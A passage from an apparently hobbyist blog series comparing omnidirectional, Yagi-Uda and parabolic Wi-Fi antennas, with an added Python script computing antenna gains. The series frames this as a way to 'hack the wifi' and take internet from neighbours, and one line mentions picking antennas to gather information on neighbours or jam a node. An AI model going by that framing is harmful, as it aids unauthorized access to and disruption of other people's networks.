It's a happy ending: the system is ready, boots in about 15 seconds, recognizes the wifi cards and required very little effort to install. Moreover, I like the way packages are installed and maintained with pacman.

Now that the box is ready, we will be able to hack the wifi ! Stay tuned, I'll be back in 2 weeks ;) !

A comparison between 3 different types of antenna

Now that we have a way to get the Internet connection from the neighborhood, we want to optimize the signal strength. Actually, we want to maximize the signal while keeping the noise as low as possible. We will call the ratio Signal/Noise the SNR. The signal and noise are measured in decibels isotropic (dBi). To simplify, we will say that a dBi is the same measure as a dB, applied to an antenna.
The isotropic antenna is the "perfect" antenna that radiates in all the direction with the same magnitude, with no loss. In other words, the isotropic antenna has no preferred direction of radiation.

Radiation of a punctual isotropic antenna

Without digging too much into details, comparing the highest peaks of the antenna with the isotropic one gives us the gain; we will assume that the bigger the SNR, the better the reception will be.

Usually, an antenna has a horizontal plane pattern called an azimuth, and a vertical plane pattern, called the elevation.

Good, now, from the end-user's point of view, which antenna is the best?

  • Omnidirectional antenna
An omnidirectional antenna is an antenna system which radiates power uniformly in one plane with a directive pattern shape in a perpendicular plane. This pattern is often described as "donut shaped".

The image of the donut is good (this is a dipole here):

Azimuth of the donuts, the emitter is in the middle.

This shape can be achieved by a typical 1/2-wave dipole. Hum, for wireless, 1/2-wave means around a 6cm dipole.



When increasing the size of your antenna, the azimuth pattern gets smoother. To give an example, imagine that you are living on the 3rd floor of a building. If you have a small omnidirectional antenna, people from the ground floor will be able to catch your signal. If you increase the size of your antenna, people from the ground floor won't be able to catch it anymore (and vice-versa), but it will reach more people horizontally.

Typically, this kind of antenna is cool when wardriving, but for everyday, especially if you stay at the same point (ie at home), it's not very useful. Suppose you fix it on your balcony, do you really care about the backward radiation ? We want then a more directive antenna to maximize the [forward] gain.

Finally, it is nice to notice that an omnidirectional antenna does depend on the wavelength (and obviously on the frequency), thus an antenna used for FM radio (100MHz) will be much bigger than an omnidirectional antenna used for Wifi (2.4 GHz). This also explains why car antennas were so big a few years ago; now electronics try to replace them, but usually an inadequate antenna requires a damn lot of power... so maybe the solution for cellphones to have a longer battery life is simply to add an antenna to them? Yes, probably, but they wouldn't fit into your pocket anymore.
  • Yagi-Uda antenna




This antenna became famous with the advent of television. It is widely used for terrestrial transmission. This is already a directional antenna, where the dipoles work in a synergistic way. Mathematically, it is pretty difficult to understand exactly how it works, but intuitively, the signal is "driven" by the dipoles. The gain of the antenna can be approximated by

GT = 1.66 * N

where N is the number of dipoles (source: Wikipedia). It also means that the longer the antenna, the higher the gain. Again, it is worth noticing that the spacing of the dipoles depends on the wavelength (1/10 of the wavelength) and thus the Yagi-Uda antenna is not a universal antenna, i.e. an antenna working for Wifi won't work for TV, for example.


Its [forward] radiation pattern looks like a pear. This antenna is a good trade-off between the omnidirectional antenna and the parabolic one: it offers a good gain without having to be too precise when pointing. Moreover, we essentially have a forward radiation pattern, which is what we are looking for when being at a fixed point. Indeed, we try to minimize the backward radiation, which is usually not really desired.

The Yagi antenna is very easy to build - or to buy on eBay :P - and is the antenna of choice when you need something discreet / light, to take with you when you go on vacation for example. If you are looking for maximum gain, this is probably not the one you'd choose.

Finally, in the same family, you have the log-periodic antenna, which is a derivative of the Yagi-Uda. In the log-periodic antenna, each dipole is smaller than the previous (how much smaller do you think ?).



  • Parabolic antenna
This family of antennas is extremely well known due to its use in satellite communication. Moreover, its principle of radiation is easy to understand, because one can draw an analogy with optics. Basically, it works like a lens.

What is cool about parabolic antennas is that they are universal: one antenna working for Wifi can work for other purposes. Moreover, the gain is directly proportional to the area of your antenna, meaning that the bigger your antenna, the more gain it will have.



As an analogy, we can see the parabolic antenna as a laser: it is difficult to point at the right place, but when it is pointed right, you get the maximum SNR. Note that the radiation pattern has a sort of unwanted "flower" radiating backward.
The higher the gain, the more peaks you'll have, the thinner the forward radiation pattern will be, and the more difficult it will be to point in the desired direction.

Typically, this is the antenna I prefer when you don't have to move it. It is very difficult to point at the emitter (there are different techniques though), but once you get it, the SNR you get is just awesome! Sadly, this kind of antenna only has an efficiency of around 50% :(. Moreover, it is cumbersome: an antenna of 24dbi has a 1 meter diameter... so it's not a good choice when traveling. However, manufacturers try to make them pretty light: since they are not solid like TV dishes, they are called grid antennas. The grid does not impede the signal while tremendously reducing the weight. So you might wonder why not do that for TV satellite dishes? I'll let you think a bit about that.

Note that with a parabolic antenna, you might introduce the hidden node problem, hence RTS/CTS becomes a need. Moreover, when dealing with big distances, other problems may occur, but we will probably talk about this later on.
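To put numbers on the sizes and gains quoted in this post, here is an added Python example (not from the post): it derives the half-wave dipole length at the Wi-Fi channel used earlier (2.412 GHz, channel 1, an assumption), turns the post's Yagi approximation GT = 1.66 * N into dBi, and applies the standard parabolic-dish aperture formula G = η (π D / λ)² with the post's 50% efficiency to check the "24 dBi at about 1 m" figure. The dish formula and the conversion 10·log10(G) are standard antenna theory and not from the post.

```python
"""Worked antenna figures for the numbers quoted in the post (added example).

wavelength = c / f; a half-wave dipole is wavelength/2 long; the post's Yagi
approximation G = 1.66 * N is a linear gain; a parabolic dish has
G = eta * (pi * D / wavelength)^2 (standard aperture formula, not from the
post). Linear gain to dBi: 10 * log10(G). The 2.412 GHz frequency (channel 1,
as in the hostapd configs) is our choice, not the post's.
"""
import math

C = 299_792_458.0  # speed of light in m/s


def wavelength(freq_hz):
    return C / freq_hz


def half_wave_dipole_length(freq_hz):
    """Length of a half-wave dipole in metres."""
    return wavelength(freq_hz) / 2


def to_dbi(gain_linear):
    return 10 * math.log10(gain_linear)


def yagi_gain_dbi(n_elements):
    """The post's approximation GT = 1.66 * N, expressed in dBi."""
    return to_dbi(1.66 * n_elements)


def parabolic_gain_dbi(diameter_m, freq_hz, efficiency=0.5):
    """Dish gain in dBi; efficiency 0.5 is the figure the post quotes."""
    return to_dbi(efficiency * (math.pi * diameter_m / wavelength(freq_hz)) ** 2)


def parabolic_diameter_for_gain(gain_dbi, freq_hz, efficiency=0.5):
    """Inverse of parabolic_gain_dbi: the dish diameter needed for gain_dbi."""
    gain_linear = 10 ** (gain_dbi / 10)
    return wavelength(freq_hz) / math.pi * math.sqrt(gain_linear / efficiency)


def snr_db(signal_dbm, noise_dbm):
    """SNR in dB from the Signal/Noise levels iwconfig prints (both in dBm)."""
    return signal_dbm - noise_dbm


if __name__ == "__main__":
    f_wifi, f_fm = 2.412e9, 100e6
    print("half-wave dipole at 2.412 GHz: %.1f cm" % (100 * half_wave_dipole_length(f_wifi)))
    print("half-wave dipole at 100 MHz:   %.2f m" % half_wave_dipole_length(f_fm))
    for n in (3, 5, 10, 20):
        print("Yagi with %2d elements: %.1f dBi" % (n, yagi_gain_dbi(n)))
    print("1 m dish, 50%% efficiency: %.1f dBi" % parabolic_gain_dbi(1.0, f_wifi))
    print("dish for 24 dBi: %.2f m" % parabolic_diameter_for_gain(24, f_wifi))
    print("iwconfig Signal -83 dBm / Noise -83 dBm: SNR %.0f dB" % snr_db(-83, -83))
```

Running it shows the dipole at about 6.2 cm and a 1 m dish at about 25 dBi, in line with the post's "around 6 cm" and "24 dBi at 1 meter"; the FM dipole comes out around 1.5 m, which is the size difference the post describes.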

There exist many more antennas, like the cantenna (the famous Pringles can) or the "panel antenna" that can have an efficiency up to 90%, but these are the ones I had the opportunity to try. Depending on your needs, the choice of antenna can be very important. For example, if you decide to gather information about your surrounding neighbours, you'll choose an omnidirectional antenna, whereas if you are trying to jam a specific node, a high gain antenna will do the job.

Antennas are a wide topic, sometimes difficult to express purely mathematically, and they usually require deep analysis to know the radiation pattern exactly. There is so much to say about antennas that it cannot be summarized in one post, and fully understanding them requires a deep understanding of electromagnetism. However, I just wanted to give an insight into how they work and where they can be used.

Finally, I opted for the parabolic antenna, because I was looking for maximum gain, since I have big distances between houses. Next, we will see how to tweak your repeater to have the best internet possible.